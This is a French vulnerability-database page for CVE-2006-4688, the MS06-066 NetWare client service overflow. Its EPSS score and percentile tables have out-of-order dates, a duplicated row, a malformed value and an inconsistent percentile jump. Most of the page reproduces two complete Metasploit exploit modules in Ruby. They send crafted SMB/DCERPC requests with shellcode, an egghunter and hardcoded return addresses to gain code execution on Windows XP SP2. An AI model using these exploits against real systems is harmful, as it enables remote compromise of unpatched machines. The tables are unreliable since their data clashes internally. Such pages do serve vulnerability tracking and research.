CVE-2006-4688 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	87.31%	–	–
2023-03-12	–	–	–	97.02%	–
2023-04-23	–	–	–	96.94%	–
2023-05-28	–	–	–	96.83%	–
2023-06-18	–	–	–	96.83%	–
2023-08-13	–	–	–	96.82%	–
2023-09-24	–	–	–	96.84%	–
2024-01-14	–	–	–	96.67%	–
2024-02-18	–	–	–	96.84%	–
2024-04-14	–	–	–	96.7%	–
2024-06-02	–	–	–	96.75%	–
2024-07-21	–	–	–	96.55%	–
2024-10-06	–	–	–	96.68%	–
2024-12-22	–	–	–	96.6%	–
2025-03-09	–	–	–	96.4%	–
2025-01-19	–	–	–	96.6%	–
2025-03-09	–	–	–	96.4%	–
2025-03-18	–	–	–	–	78.29%
2025-03-30	–	–	–	–	78.5%
2025-05-01	–	–	–	–	78.88%
2025-05-01	–	–	–	–	78.88,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-04-23	1%
2023-05-28	99%
2023-06-18	1%
2023-08-13	1%
2023-09-24	1%
2024-01-14	1%
2024-02-18	1%
2024-04-14	1%
2024-06-02	1%
2024-07-21	1%
2024-10-06	1%
2024-12-22	1%
2025-03-09	1%
2025-01-19	1%
2025-03-09	1%
2025-03-18	99%
2025-03-30	99%
2025-05-01	99%
2025-05-01	99%

## # $Id: ms06_066_nwapi.rb 10150 2010-08-25 20:55:37Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Services MS06-066 nwapi32.dll', 'Description' => %q{ This module exploits a stack buffer overflow in the svchost service, when the netware client service is running. This specific vulnerability is in the nwapi32.dll module. }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10150 $', 'References' => [ [ 'CVE', '2006-4688'], [ 'OSVDB', '30260'], [ 'BID', '21023'], [ 'MSB', 'MS06-066'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 296, 'BadChars' => "", 'Compat' => { # -ws2ord XXX? }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2', { 'Ret' => 0x00EBEEEC , }, ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 14 2006')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'srvsvc']), ], self.class) end def exploit # [in] [unique] wchar * # [in] wchar * # [in, out] long # [out] handle # Generate the egghunter payload hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true }) egg = hunter[1] #print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}") # Add giant blocks of guard data before and after the egg eggdata = rand_text(1024) + egg + rand_text(1024) buflen = 295 ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + rand_text(buflen-hunter[0].length) + [ target.ret ].pack('V') + "\x00" #ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00" stubdata = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString("\\\\BBBB") + NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE! #NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") + NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + #NDR.long((ofstring.length * 2) + 0xC) + eggdata print_status("Connecting to the SMB service...") connect() smb_login() handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") print_status("Calling the vulnerable function...") begin dcerpc.call(0x09, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse print_status('Server did not respond, this is expected') rescue => e if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ print_status('Server disconnected, this is expected') else raise e end else print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}") end # Cleanup handler disconnect if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil and dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00") return true else return false end end end

## # $Id: ms06_066_nwwks.rb 9262 2010-05-09 17:45:00Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Services MS06-066 nwwks.dll', 'Description' => %q{ This module exploits a stack buffer overflow in the svchost service, when the netware client service is running. This specific vulnerability is in the nwapi32.dll module. }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9262 $', 'References' => [ [ 'CVE', '2006-4688'], [ 'OSVDB', '30260'], [ 'BID', '21023'], [ 'MSB', 'MS06-066'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 1000, 'BadChars' => "", 'Compat' => { # -ws2ord XXX? }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2', { 'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret }, ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 14 2006')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nwwks']), ], self.class) end def exploit # [in] [unique] wchar * # [in] [unique] wchar * # [out] long ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00" stubdata = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") + NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) print_status("Connecting to the SMB service...") connect() smb_login() handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") print_status("Calling the vulnerable function...") begin dcerpc.call(0x01, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse print_status('Server did not respond, this is expected') rescue => e if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ print_status('Server disconnected, this is expected') else raise e end else print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}") end # Cleanup handler disconnect if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil and dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00") return true else return false end end end